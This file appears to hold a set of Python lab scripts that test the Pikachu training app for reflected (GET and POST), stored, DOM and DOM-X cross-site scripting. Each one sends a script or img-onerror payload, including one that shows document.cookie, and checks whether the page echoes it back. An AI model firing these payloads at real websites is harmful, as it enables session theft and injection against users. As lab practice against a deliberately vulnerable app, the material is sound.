xss反射型get,
post,
存储型xss,
dom,
dom-x
#DOM型的xss注入点在HTML内容节点,用标签/事件执行JS;DOM-X型注入点在HTML标签属性(如href)中,需要先闭合属性,再注入恶意代码
import requests

# Reflected XSS (GET) check against the lab page.
# The marker is sent as the `message` query parameter and the response body is
# searched for the same string. A hit only shows that the parameter is reflected
# verbatim (i.e. without output encoding) -- nothing is executed by this client.
# The server-side fix is context-aware output encoding of `message`.
TARGET_GET = "http://192.168.8.1/pikachu-master/vul/xss/xss_reflected_get.php"
MARKER = "<script>alert('1')</script>"
query = {
    "message": MARKER,
    "submit": "submit",
}
response = requests.get(TARGET_GET, params=query)
print("=" * 50)
print("[+] 注入完成!")
print("检测漏洞是否注入成功: ", MARKER in response.text)
import requests

# Reflected XSS (POST) check behind a login form.
# A Session is used so that whatever cookies the login response sets are sent
# with the follow-up POST. The login response body itself is not needed, so it
# is not kept. Only `reply` -- the response of the vulnerable form -- is scanned
# for the marker; scanning the login response instead was the author's earlier
# mistake (see the original note on the last print).
session = requests.Session()
LOGIN_URL = "http://192.168.8.1/pikachu-master/vul/xss/xsspost/post_login.php"
FORM_URL = "http://192.168.8.1/pikachu-master/vul/xss/xsspost/xss_reflected_post.php"
credentials = {
    "username": "admin",
    "password": "123456",
    "submit": "Login",
}
session.post(LOGIN_URL, data=credentials)  # keep the session state only
MARKER = "<script>alert(document.cookie)</script>"
form = {
    "message": MARKER,
    "submit": "submit",
}
reply = session.post(FORM_URL, data=form)
print("[+] 语句已注入")
print("查询页面是否注入: ", MARKER in reply.text)
import requests

# Stored XSS check.
# The marker is posted through the message form and the immediate response is
# searched for it. A hit shows the submitted text is rendered back unencoded.
# Note that this script only inspects the direct response; it does not reload
# the page to confirm the value actually persisted for later visitors.
TARGET_STORED = "http://192.168.8.1/pikachu-master/vul/xss/xss_stored.php"
MARKER = "<script>alert('xss')</script>"
form = {
    "message": MARKER,
    "submit": "submit",
}
response = requests.post(TARGET_STORED, data=form)
print("[+] 完成注入!")
print("[+] 查看是否注入成功:", MARKER in response.text)
import requests

# DOM XSS probe.
# Because the sink is client-side (the page's own JavaScript), a plain HTTP
# client cannot tell whether anything executes, so no check on the response
# body is made here. The script only reports the request URL that requests
# built (percent-encoded), which would have to be opened in a browser to verify.
TARGET_DOM = "http://192.168.8.1/pikachu-master/vul/xss/xss_dom.php"
MARKER = "'><img src='' onerror='alert(1)'/>"
response = requests.get(TARGET_DOM, params={"text": MARKER})
print("[+] 注入完成!")
print("[+] 攻击url: ", response.url)
#DOM型的xss注入点在HTML内容节点,用标签/事件执行JS;DOM-X型注入点在HTML标签属性(如href)中,需要先闭合属性,再注入恶意代码
import requests

# DOM-X XSS probe (injection point inside an attribute value).
# As with the DOM case, execution happens client-side and is not observable
# from this script; the response is fetched but not inspected. The printed link
# is assembled by hand and is therefore NOT percent-encoded, unlike
# `response.url` -- NOTE(review): confirm which form is intended.
TARGET_DOM_X = "http://192.168.8.1/pikachu-master/vul/xss/xss_dom_x.php"
MARKER = "'><img src='' onerror='alert(1)'/>"
response = requests.get(TARGET_DOM_X, params={"text": MARKER})
print("[+] 完成注入! ")
print(f"点击链接:{TARGET_DOM_X}?text={MARKER}")
print(" 查看回显 ")  # plain string; the original f-string had no placeholders